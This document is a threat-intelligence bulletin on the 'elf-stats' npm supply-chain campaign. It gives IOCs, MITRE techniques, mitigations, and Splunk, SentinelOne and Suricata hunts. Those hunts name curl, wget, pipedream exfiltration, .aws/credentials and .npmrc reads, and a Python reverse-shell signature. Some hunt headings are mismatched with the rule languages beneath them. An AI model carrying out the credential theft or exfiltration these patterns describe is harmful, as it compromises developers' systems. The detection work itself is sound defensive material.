Targeted Sectors

·         Software development, technology

·         Cloud services
Any organization using npm packages in their CI/CD pipelines

Targeted Countries

·         Global

BLUF

A new wave of malicious npm packages, tracked as "elf-", was discovered and quickly reported, designed to steal sensitive system data and authentication credentials from developer environments.

Date of First Reported Activity

·         December 2025 latest wave.

Date of Last Reported Activity Update

·         December 15, 2025

APT Names

·         Not publicly attributed to a specific APT

·         There is speculation that this might be tied to North Korean actors but  that has not been confirmed.

Associated Criminal Organization Names

·         None identified at this time.

IOCs

Malicious npm Packages

Naming Pattern

Packages typically follow the schema elf-stats-[adjective]-[noun]-[number].

Specific Examples

·         elf-stats-northbound-wishlist-684

·         elf-stats-mulled-stockpile-411

·         elf-stats-automated-update-123 (Representative of the ~420–1,000 variants detected)

Network & Infrastructure IOCs

C2 Endpoints

Malicious payloads exfiltrate system data (IP addresses, hostnames, DNS settings, and credentials) to:

Pipedream Endpoints

[unique-id].m.pipedream.net (Used for data collection and reverse shells).

Discord Webhooks

Various Discord-controlled endpoints used for automated data logging.

Proxy/Relay IP

91[.]238[.]181[.]250 (Previously associated with similar npm backdoor payloads).

File & Behavioral Indicators

Persistence Mechanisms

Simple malware variants that execute an overt reverse shell upon installation using postinstall hooks

Tools Used in Campaign

·         Malicious JavaScript code executed during the preinstall phase of packages.

CVEs and CVSS Vectors

·         None associated

·         This is social engineering/malicious code rather than exploiting a specific software vulnerability

Nessus ID

·         This has not been tied to CVEs

Patching

·         No specific patch, as it relies on developer vigilance and secure practices.

Mitigation Data

·         Mitigation involves checking for unknown package updates and rolling/invalidating all credentials (npm tokens, GitHub, AWS, Azure keys) if compromise is suspected.

·         Use automated security tools (like Amazon Inspector or OpenSSF registry) for real-time package scanning.

Malware Names

elf-stats-northbound-wishlist-684

Malware Samples

sha256

844013025bf7c5d01e6f48df0e990103ad3c333be31f54cf5301e1463f6ca441

URL Link to sample

·         hxxps://www.virustotal.com/gui/file/844013025bf7c5d01e6f48df0e990103ad3c333be31f54cf5301e1463f6ca441

TTPs

Initial Access

·         T1195.001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools

o   Mass-publishing hundreds of malicious npm packages (e.g., elf-stats-northbound-wishlist-684) to be inadvertently integrated into developer projects or CI/CD workflows

Execution

·         T1059.004: Command and Scripting Interpreter: Unix Shell

o   Using malicious postinstall scripts within the package.json file to automatically execute commands upon package installation (npm install)

·         T1059.006: Command and Scripting Interpreter: Python

o   Utilizing Python-based one-liners to establish reverse shells on compromised systems

Persistence

·         T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

o   (Observed in Windows-targeted variants) adding entries to startup folders to maintain access across reboots

Discovery

·         T1082 System Information Discovery

o   Automated gathering of hostnames, IP addresses, network interfaces, and DNS configurations.

·         T1087.001 Account Discovery Local Account

o   Scanning for local developer usernames and system profiles.

·         T1552.001 Unsecured Credentials Credentials In Files

o   Searching for sensitive environment variables, .aws/credentials, and .npmrc files containing authentication tokens.

Command and Control (C2)

·         T1105: Ingress Tool Transfer

o   Downloading secondary payloads or reverse shell scripts from external repositories post-infection.

·         T1071.001 Application Layer Protocol Web Protocols

o   Exfiltrating stolen data to legitimate service endpoints like Pipedream (*.m.pipedream.net) and Discord Webhooks to blend with normal traffic.

·         T1090: Proxy

o   Using proxy servers to mask the attacker's true IP address during data exfiltration

Exfiltration

·         T1041 Exfiltration Over C2 Channel

o   Packaging system metadata and stolen credentials into HTTP POST requests sent directly to attacker-controlled collector endpoints.

Suggested Rules / Potential Hunts

Just as a reminder these are indicator rules they are likely to be noisy

Suggested Suricata Rules

NPM post-install execution

spl

index=os_logs sourcetype=sysmon EVENT_ID=1

| eval process_name=lower(process_name), parent_process_name=lower(parent_process_name)

| where parent_process_name IN ("node.exe", "npm", "node")

  AND process_name IN ("cmd.exe", "powershell.exe", "sh", "bash", "python", "python3")

| search process_command IN ("*elf-stats*", "*curl*", "*wget*", "*pipedream*", "*discord.com*")

| stats count by host, user, process_command, parent_process_command

| rename process_command as "Detected_Payload"

Suggested SentinelOne Rules

SentinelOne (S1) Query (EDR/XDR)

Hunt Focus: Look for the "Unsigned Code" or "Suspicious Parent-Child Relationship" alerts specifically involving node spawning python or bash with a network connection

Query (STAR Format):

sql

ParentProcessName == "node.exe" OR ParentProcessName == "npm"

AND (

    Commandline Contains "elf-stats"

    OR Commandline Contains ".aws/credentials"

    OR Commandline Contains ".npmrc"

    OR Commandline Contains "env"

)

AND (

    Indicator == "Reverse Shell"

    OR Indicator == "Suspicious Script Execution"

)

Suggested Splunk Hunts

Detect Pipedream Exfiltration

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE npm elf-stats Campaign Exfiltration (Pipedream)"; flow:established,to_server; content:"POST"; http_method; content:".m.pipedream.net"; http_host; content:"elf-stats"; http_client_body; reference:url,socket.dev/blog/60-malicious-npm-packages-leak-network-and-host-data; classtype:trojan-activity; sid:20251201; rev:1;)

Detect Reverse Shell Activity via Python (Common in elf-stats)

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET ATTACK_RESPONSE Python Reverse Shell (elf-stats)"; flow:established,from_server; content:"Python"; pcre:"/import\s+socket,os,pty/"; reference:url,cisa.gov/news-events/analysis-reports; classtype:bad-unknown; sid:20251202; rev:1;)

Delivery Method

·         Compromised maintainer accounts or social engineering to publish malicious packages to the public NPM registry.

Email Samples

Campaign Delivery Mechanism

Research as of December 2025 indicates that the "elf-" campaign does not primarily utilize a specific "phishing email" for delivery. Instead, it employs the following methods:

·         Automated Mass-Publishing: Approximately 1,000 unique packages were published at a rate of one every two minutes from disposable accounts.

·         Search Engine/Registry Poisoning: By flooding the npm registry with hundreds of packages containing keywords like "stats," "automated-update," or "northbound," the actors hope developers will inadvertently include these "helper" libraries in their package.json dependencies.

·         Dependency Confusion: Some packages target specific internal naming conventions of corporate DevOps environments to be pulled in during automated build processes.

Contextual Email Indicators (Attacker Accounts)

While victims may not receive a direct email, the threat actors used specific email patterns to register their malicious npm accounts. Indicators from the December 2025 wave and similar concurrent campaigns include:

·         Throwaway Naming: Accounts created minutes before publication with no linked GitHub or repository history.

·         Pattern-Based Registration Emails: Similar campaigns in 2025 used incrementally numbered Gmail accounts for registration (e.g., npm9960+1@gmail.com, npm9960+2@gmail.com).

Comparison: The "Contagious Interview" Lure

It is important to distinguish the automated "elf-" campaign from the "Contagious Interview" campaign (attributed to North Korean actors), which does use direct email and LinkedIn lures.

·         Lure Style: Fake job offers or technical coding assessments.

·         Example Email Themes: "Senior AI and DevOps Engineer" roles or "Technical screening invitation".

·         Payload Delivery: These emails contain links to repositories that require the user to run npm install, which then executes malicious packages similar to the "elf-" variants.

Summary for Defenders: You are more likely to find the "elf-" campaign in your CI/CD logs or dependency manifests than in your email inbox. Any outgoing traffic to *.m.pipedream.net or Discord webhooks originating from a build server should be treated as a high-priority incident.

References

Open Source Malware

hxxps://opensourcemalware.com/blog/elf-stats-spam-campaign

X

https://x.com/pollyplummer/status/1996250889523249396

AWS News

hxxps://aws-news.com/article/2025-12-15-what-aws-security-learned-from-responding-to-recent-npm-supply-chain-threat-campaigns

Wiz IO

hxxps://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack

Socket Dev

hxxps://socket.dev/blog/elves-on-npm

CheckMarx

hxxps://checkmarx.com/zero-post/npm-hit-by-shai-hulud-the-self-replicating-supply-chain-attack

Amazon Web Services

hxxps://aws.amazon.com/blogs/security/what-aws-security-learned-from-responding-to-recent-npm-supply-chain-threat-campaigns

VirusTotal

hxxps://www.virustotal.com/gui/file/844013025bf7c5d01e6f48df0e990103ad3c333be31f54cf5301e1463f6ca441